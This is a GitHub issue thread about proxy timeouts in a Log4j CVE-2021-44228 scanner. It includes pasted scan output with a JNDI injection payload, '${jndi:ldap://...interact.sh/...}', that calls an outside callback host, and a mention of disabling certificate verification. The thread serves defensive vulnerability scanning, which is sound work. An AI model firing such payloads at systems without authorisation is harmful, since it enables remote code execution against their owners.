New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
EXCEPTION: HTTPConnectionPool(host='PROXY', port=8080): Read timed out. (read timeout=4) #50
Comments
Hi @mansam-ger , Are you sure that the machine is able to reach your PROXY ? |
I'm behind proxy as well. And I'm sure that I can reach proxy server from that machine (I'm using it for many other things and it's working fine) I'm getting:
|
Hi @macosxgeek , here it seems that you are not able to reach interact.sh. I syour machine or your preoxy able to reach it? |
I think so.. Sorry - I had to hide proxy IP.. But I'm getting: /log4j-scan-master » curl -x xxx.xxx.xx.xx:xxxx interact.sh -I |
Also - Can I ask if there is any specific format in which I need to enter the IP address and port of proxy server? |
the format for the proxy option is the one required by python requests: "http[s]://(ip):(port)" |
let see if with this PR it goes better! let me know. |
yes, proxy is reachable, proxy can connect to interact.sh (was also a problem i had to fix) |
I pushed a fix to make sure that interact and dnslog.cn are working with proxies, and also added a change to disable cert verification for interact-sh to help running the tool in networks with SSL interception. Should be sorted now! |
Proxy is working fine now. But I'm getting: requests.exceptions.ProxyError: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by ProxyError('Cannot connect to proxy.', OSError('Tunnel connection failed: 403 Forbidden'))) |
Add deregistering feature for interactsh Multiprocess and IP range improved messages addressing issue fullhunt#50
improved messages addressing issue #50
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: http://URLTOBESCANNED
[•] URL: http://URLTOBESCANNED | PAYLOAD: ${jndi:ldap://[snip].interact.sh/chef93i}
EXCEPTION: HTTPConnectionPool(host='PROXY', port=8080): Read timed out. (read timeout=4)
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
[•] Targets does not seem to be vulnerable.
I try to scan an get the message in the title. it says the prxy does not respond. then it goes on to say that it scanned. so did the scan work or did it fail?
The text was updated successfully, but these errors were encountered: